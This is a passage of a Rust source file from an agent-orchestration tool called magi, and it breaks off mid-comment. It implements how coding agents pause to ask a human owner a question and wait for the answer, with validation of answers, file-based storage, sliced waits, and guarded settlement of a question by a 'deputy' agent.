Skip to main content

magi/
ask.rs

1//! Questions: what an agent does when the next decision is the owner's.
2//!
3//! An agent that reaches a fork it has no authority to take - which storage
4//! backend, whether a breaking change is acceptable, which of two readings of
5//! the task is meant - has two options. It can guess, and produce an
6//! implementation the owner throws away; or it can stop and ask. This module is
7//! the second option, and it is the reason the graph can be left alone
8//! overnight without also being left to invent product decisions.
9//!
10//! Stopping is cheap on purpose. The run parks as [`RunStatus::Waiting`], which
11//! [`crate::daemon::settle`] refunds, so a question does not spend a task's
12//! retry budget: an operator who asks twice would otherwise come back to a held
13//! task that never had a line of code judged.
14//!
15//! # Shape
16//!
17//! Deliberately the same split as [`crate::queue`]. [`Question`] is data plus
18//! *pure* transitions - [`Question::answer`] is where a phone posting a choice
19//! the question never offered is rejected, and it touches no disk. [`Questions`]
20//! owns all I/O and is constructed with its root, so a test drives a real store
21//! in a temp directory without touching the operator's real home.
22//!
23//! One question is one JSON file under [`Questions`]'s root, written atomically.
24//! Files rather than a database because three processes read and write these
25//! records - the run that asked, `magi web` serving the phone, and `magi answer`
26//! at a terminal - and a rename is the only cross-process atomic write that
27//! needs no coordination between them. It is also why the wait below polls: the
28//! answer arrives in a file written by a process this one has no channel to.
29//!
30//! [`RunStatus::Waiting`]: crate::run::RunStatus::Waiting
31
32use std::path::{Path, PathBuf};
33use std::time::Duration;
34
35use anyhow::{Context, Result, bail};
36use jiff::Timestamp;
37use serde::{Deserialize, Serialize};
38
39use crate::config;
40use crate::proc::Quiet as _;
41use crate::run::RunStatus;
42
43/// On-disk format for a question. Bumped when a field's meaning changes, or -
44/// as with [`Question::thread`], [`Question::answer_timeout`] and now the
45/// waiter bookkeeping ([`Question::cwd`], [`Question::waiter`],
46/// [`Question::delivered_turns`], [`Question::answer_delivered`]) - when a
47/// new field is added that a much older magi has no notion of at all.
48///
49/// The web UI is written against this shape by hand - there is no shared schema
50/// between the front end and this struct - so a field that changes meaning
51/// without a bump here is a UI that lies silently.
52///
53/// A file is refused only when its own `schema` is *greater* than this one -
54/// see [`read_path`] - never merely different: `#[serde(default)]` on every
55/// field added since 1 is what makes an older file's absence of `thread` mean
56/// "no conversation yet" rather than "unreadable", and a strict equality check
57/// would turn every bump into an upgrade that breaks reading yesterday's
58/// question files.
59pub const SCHEMA: u32 = 7;
60
61/// How often the wait re-reads the question file.
62///
63/// Three seconds: the answer comes from a human on a phone, so the difference
64/// between three seconds and three hundred milliseconds is invisible to them,
65/// while a tight loop would `stat` and parse a file thousands of times per
66/// minute for a wait that routinely lasts hours. Nothing is held between polls -
67/// no lock, no open handle - because `magi web` and `magi answer` write the
68/// same file from other processes.
69const POLL: Duration = Duration::from_secs(3);
70
71/// How long an agent's reply may go unnoticed before it earns its own
72/// notification.
73///
74/// An operator reading the card when the agent replies does not need paging
75/// again for a conversation they are already in; one who walked away still
76/// needs the tap on the shoulder. Five minutes is a judgement call about that
77/// line, not a policy a repository has an opinion about, which is why it lives
78/// here rather than in `magi.toml`: the operator cannot tell from `magi.toml`
79/// whether they are still looking at the phone, and neither can this build, so
80/// there is nothing for a per-repository setting to be *right* about.
81const REPLY_QUIET_WINDOW: Duration = Duration::from_secs(5 * 60);
82
83/// How long the operator's notification command may run before it is killed.
84///
85/// A webhook that hangs must not hang the run. Twenty seconds is long enough
86/// for a slow HTTP round trip and short enough that the operator still gets the
87/// question filed and the run parked in a bounded time.
88const NOTIFY_TIMEOUT: Duration = Duration::from_secs(20);
89
90/// The longest a single `magi ask` invocation may block on the owner before
91/// it hands the wait back to whatever is running it, rather than to
92/// [`Question::abandon`].
93///
94/// `answer_timeout` defaults to a day, and that is a deadline for the
95/// *question*, not a budget the calling process is free to spend all at
96/// once: an agent CLI's own shell tool kills a command that runs much longer
97/// than this, and the child it kills is `magi ask` itself - the one thing
98/// that would have read the owner's answer. Run 20260908-205802-c9eb is what
99/// that looks like end to end: seat `impl-A` asked, its tool timed the wait
100/// out, and the seat's own summary said it had backgrounded the blocking
101/// `magi ask` and would "continue once the owner replies" - except nothing
102/// was left to notice the reply. The seat exited `completed`, the
103/// backgrounded child died with it, and the owner's eventual answer on the
104/// web UI had nobody left to read it.
105///
106/// So a wait is sliced instead: this call blocks for at most `WAIT_SLICE`
107/// and returns [`Wait::Pending`] if nothing happened, which is not a
108/// failure - the caller runs `magi ask --wait <id>` again, in a fresh
109/// process the tool timeout has never seen. Four minutes leaves a ten-minute
110/// tool budget room for the CLI's own startup and the notification's round
111/// trip, while staying long enough that an owner who answers within the hour
112/// is not making an agent loop through fifteen slices to hear about it.
113const WAIT_SLICE: Duration = Duration::from_secs(240);
114
115/// How long a lease stays believable after its last beat.
116///
117/// Longer than [`WAIT_SLICE`]'s hand-back gap by a wide margin: a slice that
118/// ends with [`Wait::Pending`] leaves the asking agent a moment to call
119/// `magi ask --wait` again, and a reply leaves it a moment to call `--thread`.
120/// A holder that beats every [`POLL`] and is silent for ninety seconds is gone
121/// or about to be, and a lease that is merely between two calls must not be
122/// mistaken for that - the daemon waiter would start a second agent on a
123/// conversation the first is still in.
124pub const LEASE_TTL: Duration = Duration::from_secs(90);
125
126/// How long [`Questions::update`]'s lock may be held before it is presumed
127/// left behind by a writer that died.
128const LOCK_STALE: Duration = Duration::from_secs(10);
129
130/// Environment variable naming the base URL of the web UI, for `{url}`.
131///
132/// A run cannot discover this by itself: `magi web` is a different process,
133/// usually started by hand and often on a different machine on the tailnet, and
134/// the address it settled on (Tailscale IP, port, or the fallback it warned
135/// about) exists only in that process. So the operator names it once, in the
136/// environment `magi serve` runs in - `magi web --open` prints exactly the
137/// string to use on stdout. Unset means `{url}` expands to nothing rather than
138/// to a guess: a notification carrying a link to an address nothing is
139/// listening on is worse than one carrying no link at all.
140pub const WEB_URL_ENV: &str = "MAGI_WEB_URL";
141
142/// Largest panel magi will store, html plus assets.
143///
144/// Checked as a total, before a single byte is written, because the failure
145/// this prevents is not a full disk but a half-copied panel: an agent that
146/// points at a 200 MB screen recording must get one clean error, not a
147/// directory holding the three small files that fitted before the copy died.
148/// Eight mebibytes is far more than a diff, a table and a handful of images
149/// need, and small enough that a phone on a hotel link still renders it.
150pub const PANEL_MAX_BYTES: u64 = 8 * 1024 * 1024;
151
152/// Suffix of the directory holding one question's panel.
153///
154/// A sibling of `<id>.json` rather than a subdirectory of the store, so
155/// [`Questions::list`] - which takes every `*.json` in the root - cannot ever
156/// see it, and so a panel travels with the question it belongs to.
157const PANEL_DIR: &str = ".panel";
158
159/// The panel's entry point inside its directory.
160const PANEL_HTML: &str = "index.html";
161
162/// Scratch directory a panel is assembled in before it is swapped into place.
163const PANEL_TMP: &str = ".panel.tmp";
164
165/// The one asset filename rule, applied on write **and** on read.
166///
167/// Exactly `^[A-Za-z0-9][A-Za-z0-9._-]{0,63}$`, and additionally never
168/// containing `..`. The pattern is this narrow because the name arrives from
169/// two untrusted directions and is then joined onto a path: an agent naming
170/// the asset, and a URL naming it back to [`Questions::panel_asset`]. Every
171/// character that could change what the join means is outside the set - `/`
172/// and `\` cannot appear, so no name can descend or escape; a leading `.` is
173/// refused, so no name can be `..`, `.` or a dotfile; a drive letter's `:` is
174/// refused, which matters because on Windows `Path::join` with an absolute
175/// path *discards the whole prefix* and would serve any file on the disk.
176/// `..` is refused anywhere rather than only at the front so the rule reads
177/// the same as the sentence "no traversal" to anyone auditing it.
178///
179/// The length bound keeps a name inside every filesystem's limit, so a panel
180/// that stores cannot fail to store on the operator's other machine.
181pub fn valid_asset_name(name: &str) -> bool {
182    if name.is_empty() || name.len() > 64 || name.contains("..") {
183        return false;
184    }
185    let mut chars = name.chars();
186    chars.next().is_some_and(|c| c.is_ascii_alphanumeric())
187        && chars.all(|c| c.is_ascii_alphanumeric() || matches!(c, '.' | '_' | '-'))
188}
189
190/// Where a question is in its life.
191#[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize)]
192#[serde(rename_all = "lowercase")]
193pub enum QuestionStatus {
194    /// Asked, and waiting for the owner. A run is parked behind it.
195    Open,
196    /// The owner decided. [`Question::answer`] holds what they said.
197    Answered,
198    /// Nobody answered in time, or the question outlived the run that asked.
199    /// Kept rather than deleted: what was asked and never answered is the
200    /// evidence that the operator was the bottleneck.
201    Abandoned,
202}
203
204impl QuestionStatus {
205    /// Is a run still parked behind this question?
206    pub fn open(self) -> bool {
207        matches!(self, Self::Open)
208    }
209
210    /// Lowercase name, as it appears on disk and in the API.
211    pub fn as_str(self) -> &'static str {
212        match self {
213            Self::Open => "open",
214            Self::Answered => "answered",
215            Self::Abandoned => "abandoned",
216        }
217    }
218}
219
220/// What the owner said.
221///
222/// Two shapes rather than one string because the question decides which is
223/// admissible, and [`Question::answer`] enforces it. A phone that posts
224/// `{"choice": "Redis"}` to a question that never offered Redis is a bug in the
225/// front end, and it is caught here rather than handed to an agent as fact.
226#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)]
227#[serde(rename_all = "lowercase")]
228pub enum Answer {
229    /// One of the offered choices, verbatim.
230    Choice(String),
231    /// Free text, for a question that offered no choices.
232    Text(String),
233}
234
235/// What the daemon does to the task behind a question when a particular
236/// choice is answered.
237///
238/// A closed set, attached to a choice by the asker (`magi ask --choice X
239/// --action X=resume`) and matched by the choice's exact text. Nothing here
240/// is ever derived from the wording of a label or of a free-text answer: a
241/// question without an action for the chosen label does nothing but answer.
242#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)]
243#[serde(tag = "do", rename_all = "lowercase")]
244pub enum ChoiceAction {
245    /// Resume this run of the task that owns the question.
246    Resume {
247        /// The run to continue. Must still be the task's latest run.
248        run: String,
249    },
250    /// Requeue the task as a fresh competition.
251    Requeue,
252    /// Close the task as done.
253    Done,
254}
255
256impl ChoiceAction {
257    /// Parse a `--action` value: `<label>=<verb>`, where the verb is
258    /// `resume[:<run>]`, `requeue` or `done`. A `resume` without a run takes
259    /// `default_run` (the asker's own `MAGI_RUN`). Returns the label and its
260    /// action; whether the label is one of the choices is the caller's check.
261    pub fn parse(spec: &str, default_run: &str) -> Result<(String, Self)> {
262        let Some((label, verb)) = spec.rsplit_once('=') else {
263            bail!("`--action {spec}` must look like `<choice>=<resume[:run]|requeue|done>`");
264        };
265        let label = label.trim();
266        if label.is_empty() {
267            bail!("`--action {spec}` names no choice before `=`");
268        }
269        let verb = verb.trim();
270        let action = match verb.split_once(':') {
271            Some(("resume", run)) if !run.trim().is_empty() => Self::Resume {
272                run: run.trim().to_owned(),
273            },
274            None if verb == "resume" => {
275                if default_run.is_empty() {
276                    bail!("`--action {spec}` names no run and MAGI_RUN is not set");
277                }
278                Self::Resume {
279                    run: default_run.to_owned(),
280                }
281            }
282            None if verb == "requeue" => Self::Requeue,
283            None if verb == "done" => Self::Done,
284            _ => bail!(
285                "unknown action `{verb}` in `--action {spec}`; \
286                 use resume[:<run>], requeue or done"
287            ),
288        };
289        Ok((label.to_owned(), action))
290    }
291
292    /// Short human wording, for `magi show` and the card.
293    pub fn describe(&self) -> String {
294        match self {
295            Self::Resume { run } => format!("resume run {}", short(run)),
296            Self::Requeue => "requeue the task".to_owned(),
297            Self::Done => "mark the task done".to_owned(),
298        }
299    }
300}
301
302/// Parse every `--action` value against the offered `choices`, refusing a
303/// label the question does not offer (it could never fire).
304pub fn parse_actions(
305    specs: &[String],
306    choices: &[String],
307    default_run: &str,
308) -> Result<std::collections::BTreeMap<String, ChoiceAction>> {
309    let mut out = std::collections::BTreeMap::new();
310    for spec in specs {
311        let (label, action) = ChoiceAction::parse(spec, default_run)?;
312        if !choices.contains(&label) {
313            bail!(
314                "`--action {spec}`: `{label}` is not one of the --choice values ({})",
315                choices.join(", ")
316            );
317        }
318        if out.insert(label.clone(), action).is_some() {
319            bail!("more than one --action for `{label}`");
320        }
321    }
322    Ok(out)
323}
324
325/// Who wrote one turn of a question's conversation.
326///
327/// Two values, not three: [`Question::thread`] is the record of a single
328/// question stopping and resuming, and the agent that resumes it is always
329/// the one that asked - a fresh consultant would have to be caught up on
330/// everything the first agent already knows, which is the round trip this
331/// module exists to avoid. The names and the wire spelling deliberately match
332/// [`crate::chat::Who`], which this module does not depend on: the two are the
333/// same idea in two products, and giving them the same shape is what lets the
334/// phone render both with one component.
335#[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize)]
336#[serde(rename_all = "lowercase")]
337pub enum Who {
338    /// The person the agent asked.
339    Operator,
340    /// The agent that asked, replying to a question of its own rather than
341    /// answering.
342    Agent,
343}
344
345/// One turn in a question's back-and-forth, after the question itself was
346/// asked.
347///
348/// The question's own `summary`/`detail`/`choices` already carry the agent's
349/// opening move, so a turn only exists from the moment the owner talks back -
350/// [`Question::thread`] starts empty and stays that way for the overwhelming
351/// majority of questions, which are answered on the first read.
352#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)]
353#[serde(deny_unknown_fields)]
354pub struct Turn {
355    /// Who said it.
356    pub who: Who,
357    /// What they said.
358    pub body: String,
359    /// When they said it.
360    pub at: Timestamp,
361    /// A deputy's own report beside a settle: side effects it caused and
362    /// requests it could not carry out. The deputy's claim, never checked by
363    /// magi, and kept apart from `body` so the verified "Settled as" line and
364    /// this self-report cannot be mistaken for each other.
365    #[serde(default, skip_serializing_if = "Option::is_none")]
366    pub note: Option<String>,
367}
368
369/// Who is keeping watch over an open question.
370#[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize)]
371#[serde(rename_all = "lowercase")]
372pub enum WaiterKind {
373    /// The `magi ask` process the agent started.
374    Asker,
375    /// The `magi serve` waiter ([`crate::waiter`]), resuming the asking seat's
376    /// own session because the asker is gone.
377    Daemon,
378    /// The question's deputy ([`crate::deputy`]): a short-lived seat that
379    /// `magi serve` runs for a question the conductor filed, so that something
380    /// which remembers why it was asked is on the other end.
381    Deputy,
382}
383
384/// The follow-up seat a conductor question hands its wait to.
385///
386/// The conductor itself never waits (see [`crate::conduct`]), so a free-text
387/// reply to its question would reach nobody. A deputy is a seat of its own -
388/// keyed `deputy-<question id>`, never the conductor's shared seat - that
389/// inherits what the conductor knew about this one question ([`Deputy::brief`])
390/// and blocks on it with `magi ask --wait`. Persisted on the question so a
391/// restarted daemon resumes the same CLI conversation instead of assuming it.
392///
393/// Written only through [`Questions::update`]: the owner's say and answer land
394/// on the same file.
395#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)]
396pub struct Deputy {
397    /// Why the question was asked, what each choice leads to: the conductor's
398    /// context for this one question, handed to the deputy in its prompt.
399    pub brief: String,
400    /// The agent that holds the seat. Empty until the first start.
401    #[serde(default)]
402    pub agent: String,
403    /// The deputy's own conversation. `None` until the first start.
404    #[serde(default)]
405    pub seat: Option<crate::agent::SeatState>,
406    /// How many times a deputy turn was started for this question. Never reset
407    /// by a restart, so a deputy that keeps dying is bounded.
408    #[serde(default)]
409    pub starts: u32,
410}
411
412impl Deputy {
413    /// A deputy that has not started yet, holding `brief`.
414    pub fn new(brief: String) -> Self {
415        Self {
416            brief,
417            agent: String::new(),
418            seat: None,
419            starts: 0,
420        }
421    }
422}
423
424/// Seat name of the deputy for question `id`.
425pub fn deputy_seat_key(id: &str) -> String {
426    format!("deputy-{}", short(id))
427}
428
429/// The record's note of who was last known to be waiting.
430///
431/// A note, not a promise: nothing rewrites the question when a holder dies, so
432/// whether it still holds is read from the [`Lease`] beside it.
433#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)]
434pub struct Waiter {
435    /// Who took the wait.
436    pub kind: WaiterKind,
437    /// When they took it.
438    pub since: Timestamp,
439}
440
441/// A sidecar (`<id>.lease`) saying that something is alive and waiting.
442///
443/// A sidecar rather than a field of the question because a holder beats every
444/// few seconds, and rewriting the question that often would race the phone's
445/// answer and say with lost updates. It is not `*.json`, so
446/// [`Questions::list`] never sees it. No pid check: pids are reused and mean
447/// different things across platforms, while a beat that stopped is evidence on
448/// every one.
449#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)]
450pub struct Lease {
451    /// Who beat last.
452    pub kind: WaiterKind,
453    /// Their process id, for a human reading the file.
454    pub pid: u32,
455    /// When they beat last.
456    pub beat_at: Timestamp,
457}
458
459impl Lease {
460    /// Was the last beat recent enough to believe the holder is still there?
461    pub fn fresh(&self, now: Timestamp) -> bool {
462        now.as_second() - self.beat_at.as_second() <= LEASE_TTL.as_secs() as i64
463    }
464}
465
466/// One decision magi will not take on the owner's behalf.
467#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)]
468#[serde(deny_unknown_fields)]
469pub struct Question {
470    /// On-disk format version.
471    pub schema: u32,
472    /// Question id, e.g. `20260902-231501-ab12`. Same shape as a run's and a
473    /// task's, so the operator can paste any of them at any prefix argument.
474    pub id: String,
475    /// Run that is parked behind this question.
476    pub run: String,
477    /// Graph node the asking agent was working in, e.g. `implement`.
478    pub node: String,
479    /// Seat that asked, e.g. `impl-A`. Recorded because "which agent needs
480    /// this" decides whether the answer unblocks one candidate or all of them.
481    pub seat: String,
482    /// One line: the question itself. This is what a notification carries and
483    /// what the phone shows above the answer controls.
484    pub summary: String,
485    /// The reasoning behind the question, as markdown. May be long, may be
486    /// empty. Rendered as text nodes by the UI, never as markup.
487    pub detail: String,
488    /// The admissible answers. **Empty means free text** - that one condition
489    /// is the whole difference between the two kinds of question, on disk, in
490    /// the UI, and in [`Question::answer`]'s validation.
491    pub choices: Vec<String>,
492    /// What the daemon does when a given choice is answered, keyed by the
493    /// choice's exact text. Empty for an ordinary question. A key is always
494    /// one of [`Question::choices`]; `#[serde(default)]` so older files read.
495    #[serde(default)]
496    pub actions: std::collections::BTreeMap<String, ChoiceAction>,
497    /// Does this question have an agent-authored HTML panel beside it?
498    ///
499    /// Serialised with a default so a question written by an older magi - or
500    /// by hand - still deserialises rather than failing the whole store, which
501    /// under [`Questions::list`]'s skip-unreadable rule would quietly hide the
502    /// open question the operator was looking for.
503    #[serde(default)]
504    pub panel: bool,
505    /// Files copied in beside the panel's html, by base name, sorted.
506    ///
507    /// The list exists so a reader knows what a panel is made of without
508    /// walking the directory, and every entry satisfies [`valid_asset_name`].
509    /// Sorted because it is compared - a question re-asked with the same
510    /// assets in a different argument order is not a different question.
511    #[serde(default)]
512    pub assets: Vec<String>,
513    /// Current state.
514    pub status: QuestionStatus,
515    /// When the agent asked.
516    pub asked_at: Timestamp,
517    /// When the owner answered, if they did.
518    pub answered_at: Option<Timestamp>,
519    /// What they said.
520    pub answer: Option<Answer>,
521    /// Everything said after the question itself, oldest first: the owner
522    /// asking back, the agent replying, as many times as it takes before an
523    /// [`Answer`] lands.
524    ///
525    /// `#[serde(default)]` so a question written before this field existed -
526    /// every question on disk before this build - still deserialises as one
527    /// with no conversation yet, rather than failing [`Questions::list`]'s
528    /// read and quietly hiding an open question from the operator.
529    #[serde(default)]
530    pub thread: Vec<Turn>,
531    /// The `answer_timeout`, in seconds, that was in force when this question
532    /// was first asked. `0` means unrecorded - a question written before this
533    /// field existed, or one filed by a flow (land's merge-approval gate)
534    /// that never sets it because it never resumes a sliced wait.
535    ///
536    /// [`Question::new`] cannot know this - the effective timeout (`--timeout`,
537    /// or the config default) is decided by the caller, after the question
538    /// already exists - so it starts at `0` here and whoever files a fresh
539    /// question sets it once, the same way [`Question::panel`] is set by
540    /// [`Questions::put_panel`] rather than by the constructor. It is never
541    /// touched again: `magi ask --wait` reads it as the one deadline it is
542    /// allowed to enforce, precisely so that a `--timeout` given (or omitted)
543    /// on a later call can never quietly extend or shrink the budget the
544    /// question was actually asked with.
545    #[serde(default)]
546    pub answer_timeout: u64,
547    /// The directory the asking agent was working in when it asked, so the
548    /// daemon waiter can resume that agent's session from where it stood.
549    /// `None` for a question no `magi ask` filed (land's approval gate, a
550    /// release notice, one written before this field existed): those have no
551    /// agent to hand anything back to, and the waiter leaves them alone.
552    #[serde(default)]
553    pub cwd: Option<String>,
554    /// Who was last known to be waiting - see [`Waiter`].
555    #[serde(default)]
556    pub waiter: Option<Waiter>,
557    /// How many entries of [`Question::thread`] the agent has been shown, by
558    /// the asking process printing them or by the waiter resuming the seat.
559    /// The owner's turn at an index at or past this has reached nobody yet.
560    #[serde(default)]
561    pub delivered_turns: usize,
562    /// Has the agent been told the [`Answer`]? The asker prints it as it
563    /// returns; the waiter delivers it when the asker was gone.
564    #[serde(default)]
565    pub answer_delivered: bool,
566    /// The follow-up seat waiting on this question, for a question the
567    /// conductor filed. `None` for every other question.
568    #[serde(default)]
569    pub deputy: Option<Deputy>,
570    /// Set once the owner handed this question to the chat it came from
571    /// ([`crate::consult::begin`]). The question stays open; this only records
572    /// that the chat was asked, so a second tap does not post it twice.
573    #[serde(default)]
574    pub consult: Option<ChatConsult>,
575}
576
577/// A question the owner passed to the chat conversation its task came from.
578#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)]
579pub struct ChatConsult {
580    /// The conversation the question was posted into.
581    pub talk: String,
582    /// When it was posted.
583    pub at: Timestamp,
584}
585
586impl Question {
587    /// Does `run` hold a task id rather than a run id? True for the
588    /// conductor's and the triage questions, which are filed about a task.
589    pub fn run_names_task(&self) -> bool {
590        matches!(
591            self.node.as_str(),
592            crate::conduct::NODE | crate::triage::NODE | crate::triage::DEPS_NODE
593        )
594    }
595
596    /// Ask something. Persist it with [`Questions::put`], or hand it to
597    /// [`ask_and_wait`], which files it and waits.
598    pub fn new(
599        run: String,
600        node: String,
601        seat: String,
602        summary: String,
603        detail: String,
604        choices: Vec<String>,
605    ) -> Self {
606        Self {
607            schema: SCHEMA,
608            id: new_id(),
609            run,
610            node,
611            seat,
612            summary,
613            detail,
614            choices,
615            actions: std::collections::BTreeMap::new(),
616            panel: false,
617            assets: Vec::new(),
618            status: QuestionStatus::Open,
619            asked_at: Timestamp::now(),
620            answered_at: None,
621            answer: None,
622            thread: Vec::new(),
623            answer_timeout: 0,
624            cwd: None,
625            waiter: None,
626            delivered_turns: 0,
627            answer_delivered: false,
628            deputy: None,
629            consult: None,
630        }
631    }
632
633    /// Short form used in reports and on the phone, matching a run's short id.
634    pub fn short(&self) -> &str {
635        short(&self.id)
636    }
637
638    /// The action attached to the choice that was answered, if the question
639    /// is answered with a choice that carries one. Free text never matches.
640    pub fn chosen_action(&self) -> Option<&ChoiceAction> {
641        match (&self.status, &self.answer) {
642            (QuestionStatus::Answered, Some(Answer::Choice(c))) => self.actions.get(c),
643            _ => None,
644        }
645    }
646
647    /// Does this question want free text rather than one of a set?
648    pub fn free_text(&self) -> bool {
649        self.choices.is_empty()
650    }
651
652    /// Record an answer. Rejects a choice the question does not offer, free
653    /// text on a multiple-choice question, an empty answer, and a second
654    /// answer.
655    ///
656    /// Every rejection here is a case where accepting would put a fabrication
657    /// in front of an agent as if the owner had said it. The messages are
658    /// distinct because the caller is a web handler that shows them verbatim,
659    /// and "that is not one of the choices" and "this question is multiple
660    /// choice" are different mistakes with different fixes.
661    pub fn answer(&mut self, answer: Answer) -> Result<()> {
662        match self.status {
663            QuestionStatus::Answered => bail!(
664                "question {} was already answered; the run has moved on and a \
665                 second answer would be a decision nobody acted on",
666                self.short()
667            ),
668            QuestionStatus::Abandoned => bail!(
669                "question {} was abandoned and the run behind it is gone",
670                self.short()
671            ),
672            QuestionStatus::Open => {}
673        }
674        let body = match &answer {
675            Answer::Choice(c) | Answer::Text(c) => c.as_str(),
676        };
677        if body.trim().is_empty() {
678            bail!(
679                "question {} needs an answer; an empty one tells the agent \
680                 nothing and it would guess anyway",
681                self.short()
682            );
683        }
684        match &answer {
685            Answer::Choice(c) if self.free_text() => bail!(
686                "question {} asks for free text, so `{c}` cannot be a choice \
687                 it offered",
688                self.short()
689            ),
690            Answer::Choice(c) if !self.choices.iter().any(|o| o == c) => bail!(
691                "`{c}` is not one of the choices question {} offers: {}",
692                self.short(),
693                self.choices.join(", ")
694            ),
695            Answer::Text(_) if !self.free_text() => bail!(
696                "question {} is multiple choice; answer with one of: {}",
697                self.short(),
698                self.choices.join(", ")
699            ),
700            _ => {}
701        }
702        self.answered_at = Some(Timestamp::now());
703        self.answer = Some(answer);
704        self.status = QuestionStatus::Answered;
705        Ok(())
706    }
707
708    /// Give up on an answer, keeping the record of what was asked.
709    ///
710    /// An answered question is left alone, which matters at exactly one moment:
711    /// the owner answering in the same second the wait's deadline passes. The
712    /// answer is the thing worth keeping there, and it has already been written
713    /// by another process.
714    ///
715    /// The reason is appended to [`Question::detail`] because the on-disk shape
716    /// is a contract with the front end and has no field of its own for it -
717    /// and "asked at 3am, nobody home for a day" belongs with the question, not
718    /// only in a log the operator will never open.
719    pub fn abandon(&mut self, why: impl Into<String>) {
720        if !self.status.open() {
721            return;
722        }
723        self.status = QuestionStatus::Abandoned;
724        let why = why.into();
725        let why = why.trim();
726        if why.is_empty() {
727            return;
728        }
729        if !self.detail.is_empty() {
730            self.detail.push('\n');
731        }
732        self.detail.push_str("\n_Abandoned: ");
733        self.detail.push_str(why);
734        self.detail.push_str("._\n");
735    }
736
737    /// The answer as the asking agent should read it.
738    ///
739    /// One string for both kinds of question: the agent's prompt says "the
740    /// owner answered:", and a chosen option and a typed sentence are the same
741    /// thing at that point. `None` while the question is open or abandoned, so
742    /// a caller cannot mistake silence for a decision.
743    pub fn resolution(&self) -> Option<String> {
744        match (self.status, &self.answer) {
745            (QuestionStatus::Answered, Some(Answer::Choice(a) | Answer::Text(a))) => {
746                Some(a.clone())
747            }
748            _ => None,
749        }
750    }
751
752    /// A deputy recording that the owner's own words settled the question.
753    ///
754    /// The owner decided in free text ("setup done") on a question that offers
755    /// choices, so no choice was ever tapped. This records `label` as the
756    /// answer - and nothing else: applying it is the daemon's existing path
757    /// for an answered conductor question. Refused unless the caller is this
758    /// question's deputy seat, `label` is one of the offered choices, and
759    /// `quote` appears verbatim in something the owner said; the quote is
760    /// kept in the thread as an agent turn so the record shows what the
761    /// decision rests on.
762    pub fn settle_by_deputy(
763        &mut self,
764        seat: &str,
765        label: &str,
766        quote: &str,
767        note: Option<&str>,
768    ) -> Result<()> {
769        let Some(deputy) = &self.deputy else {
770            bail!("question {} has no deputy", self.short());
771        };
772        let own = deputy.seat.as_ref().map(|s| s.key.as_str());
773        if own != Some(seat) {
774            bail!("only the deputy of question {} may settle it", self.short());
775        }
776        if !self.choices.iter().any(|c| c == label) {
777            bail!(
778                "`{label}` is not one of the choices offered on question {}",
779                self.short()
780            );
781        }
782        let quote = quote.trim();
783        if quote.is_empty()
784            || !self
785                .thread
786                .iter()
787                .any(|t| t.who == Who::Operator && t.body.contains(quote))
788        {
789            bail!(
790                "the quote is not something the owner said on question {}",
791                self.short()
792            );
793        }
794        // The owner's latest message is what counts (an earlier one may since
795        // have been qualified or withdrawn).
796        let latest = self
797            .thread
798            .iter()
799            .rev()
800            .find(|t| t.who == Who::Operator)
801            .map(|t| t.body.trim());
802        if crate::deputy::merge_gated(self) {
803            // The merge is irreversible and a say is not a decision. `hold` must
804            // be the latest message exactly. For `merge`, whether the words are
805            // a clear, unhedged instruction is the deputy's judgement alone;
806            // all magi checks is that the quote is a verbatim part of that
807            // latest message.
808            let ok = if label == crate::land::APPROVE {
809                latest.is_some_and(|m| m.contains(quote))
810            } else if label == crate::land::HOLD {
811                latest.is_some_and(|m| {
812                    quote.eq_ignore_ascii_case(label) && m.eq_ignore_ascii_case(label)
813                })
814            } else {
815                false
816            };
817            if !ok {
818                bail!(
819                    "on a merge approval `{label}` settles it only when the quote is a \
820                     verbatim part of the owner's latest message ({}); if the wording is \
821                     doubtful, ask what they mean with `--thread` instead",
822                    if label == crate::land::HOLD {
823                        "for `hold`, the whole message"
824                    } else {
825                        "the quote must be the instruction itself"
826                    }
827                );
828            }
829        } else if crate::deputy::destructive(self, label)
830            && !latest.is_some_and(|m| crate::land::unhedged(m, quote))
831        {
832            bail!(
833                "`{label}` cannot be undone; it settles question {} only when the owner's \
834                 latest message clearly says so, unhedged and quoted verbatim (no maybe / if \
835                 / not / question); ask what they mean with `--thread` instead",
836                self.short()
837            );
838        }
839        self.thread.push(Turn {
840            who: Who::Agent,
841            body: format!("Settled as `{label}` on the owner's words: \"{quote}\""),
842            at: Timestamp::now(),
843            note: note
844                .map(str::trim)
845                .filter(|n| !n.is_empty())
846                .map(str::to_owned),
847        });
848        self.delivered_turns = self.thread.len();
849        self.answer(Answer::Choice(label.to_owned()))
850    }
851
852    /// The owner speaking back without answering: a request for context, a
853    /// clarifying question, anything short of a decision.
854    ///
855    /// Rejects the same two states [`Question::answer`] does, and for the same
856    /// reason - a question with a recorded [`Answer`] or an abandoned one has
857    /// no run left listening for a reply - and an empty turn, which would tell
858    /// the agent nothing it didn't already know. Never changes `status`: the
859    /// question stays [`QuestionStatus::Open`], because the owner did not
860    /// decide anything, they only spoke, and `count_open`/`open_for` must keep
861    /// counting this as the one question it always was.
862    pub fn say(&mut self, body: impl Into<String>) -> Result<()> {
863        match self.status {
864            QuestionStatus::Answered => bail!(
865                "question {} was already answered; there is nothing left to \
866                 discuss",
867                self.short()
868            ),
869            QuestionStatus::Abandoned => bail!(
870                "question {} was abandoned and the run behind it is gone",
871                self.short()
872            ),
873            QuestionStatus::Open => {}
874        }
875        let body = body.into();
876        if body.trim().is_empty() {
877            bail!("a message to question {} cannot be empty", self.short());
878        }
879        self.thread.push(Turn {
880            who: Who::Operator,
881            body,
882            at: Timestamp::now(),
883            note: None,
884        });
885        Ok(())
886    }
887
888    /// The agent replying to the owner's last word, in place of an answer:
889    /// same question, same id, another round.
890    ///
891    /// `choices` replaces [`Question::choices`] wholesale rather than merging,
892    /// on the same reasoning [`Questions::put_panel`] replaces a panel
893    /// wholesale: the whole point of asking back is that what should be
894    /// offered next may have changed, and a caller that wanted the old set
895    /// unchanged can simply pass it again. An empty `Vec` means free text,
